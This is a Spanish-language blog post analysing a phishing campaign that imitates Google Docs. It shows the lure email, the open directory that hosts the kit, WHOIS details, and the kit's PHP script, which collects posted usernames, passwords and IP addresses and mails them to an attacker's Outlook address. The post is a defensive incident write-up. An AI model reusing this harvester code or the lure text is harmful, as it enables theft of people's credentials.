Phishing...

Hoy recibí un correo de una lista a la que estoy suscripto, la redacción era bastante buena pero me llamó la atención el correo y sospeché que algo no estaba bien.
El texto del mensaje parecía correcto y traía debajo la firma correcta de quien lo enviaba.

******************************************************************
Google Drive. Mantenga todo. Compartir nada

Por favor revise el documento que he subido para ti usando a Google docs. CLICK aquí puedes firmar con tu correo electrónico para ver el documento es muy importante.
Gracias.

La Empresa
Direccion Nro
Madrid
******************************************************************





Al mirar el contenido interno del email en texto veo esto.

******************************************************************
Google Drive. Mantenga todo. Compartir nada

Por favor revise el documento que he subido para ti usando a Google docs.
CLICK aqu http :// e2elders.org / tuesday/gdocs/ puedes firmar con tu correo
electr=C3=B3nico para ver el documento es muy importante.

Gracias.
******************************************************************


Apunta a un sitio E2ELDERS.ORG..... sospechoso

Al pedir la página http://e2elders.org/tuesday/ en un navegador, me encuentro con esto.


******************************************************************
Index of /tuesday

Parent Directory
akira gdocu.zip
gdocs/

Apache Server at e2elders.org Port 80
******************************************************************



Bajo el fichero ZIP, lo abro en una carpeta local y encuentro esto.

Y al abrir el documento INDEX, veo esto....
Un sitio bastante bien hecho que puede engañar a los usuarios a que metan sus datos para ver un fichero adjunto.
Seguramente la mayoría de los navegadores y antivirus identificarán al sitio como PHISING.... pero puedeo que algunos caigan.

Al hacer CLICK en una de las imágenes, pide los datos y los enviará al email Newmanstuff@outlook.com.
Supongo que alguien del otro lado levanta los correos de ese email (Outlook) y recolecta miles de emails y passwords de sitios webs.

******************************************************************

< ? $adddate=date("D M d, Y g:i a"); $mesaegs ="php_info";$mesaegs ="@"; $ip = getenv("REMOTE_ADDR"); $mesaegs ="ymail";$mesaegs =".com"; $message .= "---------=ReZulT=---------\n"; $message .= "Online ID: ".$_POST['x0r1']."\n"; $message .= "Password: ".$_POST['x0r2']."\n"; $message .= "---------=IP Adress & Date=---------\n"; $message .= "IP Address: ".$ip."\n"; $message .= "Date: ".$adddate."\n"; $message .= "---------=by TeaserZ Wire=---------\n"; $sent ="Newmanstuff@outlook.com"; $subject = "Googledocs | hotmail"; $headers = "From: TeaserZ Wire";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
{
mail($mesaegs,$subject,$message,$headers);
mail($sent,$subject,$message,$headers);
}
header("Location: loading.htm");
? >

******************************************************************




Un mayor análisis muestra que el acceso al GMAIL se produce desde el mismo equipo pero el código se baja desde Holanda.

******************************************************************
Whois output for: wire.dan.gr
Hostname: WIRE.DAN.GR
Status: active
Registrant: micheal allen
Email: hidden (Contact the owner)
Redirects to: http://hosting7135001.az.pl/wp-rcf/sp%20pg2.html
Total hits: 6230
******************************************************************







RESUMEN DEL INCIDENTE
Te envían un email a tu cuenta gmail, con un mensaje bastante bien armado que parecía que era real indicando que accedas a ese link.
Para quien tiene algo de experiencia en temas de seguridad, jamás lo abrirías, pero miles de usuarios SI lo hacen.
Al Acceder a ese link desde un equipo sin antivirus (Avast lo detectada como phishing), se infecta tu equipo.
El troyano se inserta en el browser, corre en tu sesión con GMAIL, parte HTML y parte JavaScript
Establece una sesión contra un servidor externo desde donde baja código y otras páginas.
Lee la lista completa de contactos de Gmail y mandó 2 emails (uno a las cuentas A-L y otro M-Z), pidiendo que abran un documento de GMAIL enviando una página falsa.
En esa página falsa, mediante phishing pide que te valides, tengas cuenta en Outlook, gmail, yahoo o otros sistemas.
Al meter usuario / password, esos datos se envían por email a una cuenta de Outlook, indicando tambien IP, hora, etc.

Aunque el problema inicial es que un usuario hace CLICK en algo que no debe, el daño que genera y la cantidad de cuentas afectadas comienza a aumentar exponencialmente, tratando de infectar a todos los contactos de todos los contactos.


Mas noticias preocupantes. Cuantos equipos estarán vulnerados ?